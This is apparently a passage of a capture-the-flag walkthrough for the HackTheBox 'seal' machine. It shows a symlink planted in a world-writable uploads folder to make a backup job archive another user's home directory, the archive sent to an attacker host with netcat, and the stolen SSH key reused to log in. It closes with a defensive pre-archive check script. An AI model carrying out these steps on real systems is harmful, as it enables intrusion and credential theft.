Symbolic Link Attack
As discovered, there is a backup operation run by the ansible binary. The YAML file located at /opt/backups/playbook/run.yml is the configuration for the operation.
The archived files are stored in the /opt/backups/archives directory, and I do have read access to that, as I was able to open one of them.
tomcat@seal:/opt/backups/archives$ ll /var/lib/tomcat9/webapps/ROOT/admin/dashboard
total 100K
4.0K drwxr-xr-x 7 root root 4.0K May 7 2021 .
4.0K drwxrwxrwx 2 root root 4.0K May 7 2021 uploads
4.0K drwxr-xr-x 3 root root 4.0K May 6 2021 ..
72K -rw-r--r-- 1 root root 71K May 6 2021 index.html
4.0K drwxr-xr-x 5 root root 4.0K Mar 7 2015 bootstrap
4.0K drwxr-xr-x 2 root root 4.0K Mar 7 2015 css
4.0K drwxr-xr-x 4 root root 4.0K Mar 7 2015 images
4.0K drwxr-xr-x 4 root root 4.0K Mar 7 2015 scripts
It seems that I also have write access to one of the sub-directories within the source directory: /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
As the operation is being done with the privileges of the luis user, I may be able to set up a symbolic link from the writable directory pointed out above to the home directory of the luis user.
tomcat@seal:/opt/backups/archives$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
tomcat@seal:/opt/backups/archives$ ll /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads
total 8.0K
4.0K drwxrwxrwx 2 root root 4.0K Apr 11 17:25 .
0 lrwxrwxrwx 1 tomcat tomcat 10 Apr 11 17:25 luis -> /home/luis
4.0K drwxr-xr-x 7 root root 4.0K May 7 2021 ..
A symbolic link is set up in the writable directory, pointing to the home directory of the luis user.
Uploaded files get wiped off fairly quickly.
tomcat@seal:/opt/backups/archives$ ll
total 111M
4.0K drwxr-xr-x 4 luis luis 4.0K Apr 11 17:25 ..
111M -rw-rw-r-- 1 luis luis 111M Apr 11 17:25 backup-2023-04-11-17:25:32.gz
4.0K drwxrwxr-x 2 luis luis 4.0K Apr 11 17:25 .
A moment later, an archive is generated. Notice how large the archive is now. I was trying to extract the content locally, but it wouldn't let me do it due to permission issues.
tomcat@seal:/opt/backups/archives$ nc 10.10.14.7 2222 < backup-2023-04-11-17:25:32.gz
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ nnc 2222 > backup-2023-04-11-17:25:32.gz
listening on [any] 2222 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.250] 56042
So I transferred the archive to Kali over Netcat.
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ tar -xf backup-2023-04-11-17:25:32.gz --force-local
Extracting the content.
┌──(kali㉿kali)-[~/…/htb/labs/seal/ansible]
└─$ cd dashboard/uploads ; ll
total 12K
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 .
4.0K drwxr-xr-x 7 kali kali 4.0K May 7 2021 ..
4.0K drwxr-xr-x 9 kali kali 4.0K May 7 2021 luis
and there is the home directory of the luis user under the uploads/ directory.
┌──(kali㉿kali)-[~/…/seal/ansible/dashboard/uploads]
└─$ cd luis ; ll
total 51M
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 .config
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 .java
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 .local
4.0K drwx------ 2 kali kali 4.0K Apr 11 19:28 .ssh
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 .ansible
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 .cache
4.0K drwxr-xr-x 6 kali kali 4.0K Apr 11 19:28 .gitbucket
4.0K drwxr-xr-x 3 kali kali 4.0K Apr 11 19:28 ..
4.0K -r-------- 1 kali kali 33 Apr 11 16:29 user.txt
4.0K drwxr-xr-x 9 kali kali 4.0K May 7 2021 .
4.0K -rw-r--r-- 1 kali kali 220 May 5 2021 .bash_logout
4.0K -rw-r--r-- 1 kali kali 3.8K May 5 2021 .bashrc
4.0K -rw-r--r-- 1 kali kali 807 May 5 2021 .profile
51M -rw-r--r-- 1 kali kali 51M Jan 14 2021 gitbucket.war
I can see the whole thing inside, including the .ssh directory.
┌──(kali㉿kali)-[~/…/ansible/dashboard/uploads/luis]
└─$ cd .ssh ; ll
total 20K
4.0K drwx------ 2 kali kali 4.0K Apr 11 19:28 .
4.0K drwxr-xr-x 9 kali kali 4.0K May 7 2021 ..
4.0K -rw-r--r-- 1 kali kali 563 May 7 2021 authorized_keys
4.0K -rw------- 1 kali kali 2.6K May 7 2021 id_rsa
4.0K -rw-r--r-- 1 kali kali 563 May 7 2021 id_rsa.pub
and there is the SSH key pair for the luis user.
SSH
┌──(kali㉿kali)-[~/…/dashboard/uploads/luis/.ssh]
└─$ ssh luis@seal.htb -i id_rsa
The authenticity of host 'seal.htb (10.10.10.250)' can't be established.
ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'seal.htb' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue 11 Apr 2023 05:32:37 PM UTC
System load: 0.2
Usage of /: 47.7% of 9.58GB
Memory usage: 23%
Swap usage: 0%
Processes: 172
Users logged in: 0
IPv4 address for eth0: 10.10.10.250
IPv6 address for eth0: dead:beef::250:56ff:feb9:d927
* Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!
https://microk8s.io/
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri May 7 07:00:18 2021 from 10.10.14.2
luis@seal:~$ whoami
luis
luis@seal:~$ hostname
seal
luis@seal:~$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.250 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:d927 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:d927 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:d9:27 txqueuelen 1000 (Ethernet)
RX packets 111829 bytes 11557690 (11.5 MB)
RX errors 0 dropped 86 overruns 0 frame 0
TX packets 93209 bytes 360110978 (360.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1262 bytes 3931261 (3.9 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1262 bytes 3931261 (3.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Lateral movement made to the luis user by exploiting a misconfigured archiving operation.
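The two conditions that made this work were a world-writable directory inside the backup source and a job that copied whatever a symlink pointed at. The following pre-archive check is an added example, not part of the writeup or of the box's run.yml: it refuses to archive a tree that contains an escaping symlink or a world-writable directory, and it invokes tar without -h so links are stored as links. The demo tree under mktemp is constructed here to mirror the situation above.

```shell
#!/bin/sh
# Added example: guard a backup job against symlinks planted in its source tree.
# Assumes GNU find/readlink/tar and paths without whitespace.

# Print every symlink under $1 whose resolved target lies outside $1. Returns 1 if any.
find_escaping_links() {
    root=$(readlink -f "$1") || return 2
    bad=0
    for link in $(find "$root" -type l); do
        target=$(readlink -f "$link")
        case "$target" in
            "$root"/*|"$root") ;;                       # stays inside the source tree
            *) echo "ESCAPES: $link -> $target"; bad=1 ;;
        esac
    done
    return $bad
}

# Print every directory under $1 writable by others (o+w). Returns 1 if any exist.
find_world_writable_dirs() {
    out=$(find "$1" -type d -perm -o+w)
    [ -z "$out" ] && return 0
    echo "WORLD-WRITABLE: $out"
    return 1
}

# Archive $1 into $2 only when both checks pass. No -h/--dereference: tar then
# records the symlink itself rather than copying the contents it points to.
safe_archive() {
    find_escaping_links "$1" && find_world_writable_dirs "$1" || return 1
    tar -C "$(dirname "$1")" -czf "$2" "$(basename "$1")"
}

# Constructed demo tree: a source dir with a 777 uploads/ subdir holding a link
# that points at a home directory outside the source (as in the writeup).
DEMO=$(mktemp -d)
mkdir -p "$DEMO/src/uploads" "$DEMO/home/victim/.ssh"
chmod 777 "$DEMO/src/uploads"
ln -s "$DEMO/home/victim" "$DEMO/src/uploads/victim"

safe_archive "$DEMO/src" "$DEMO/backup.tgz" || echo "refused: fix the findings above first"
```

Run as the account the backup job uses; the findings name exactly the link and directory an operator has to remove or lock down before the job is safe to re-enable.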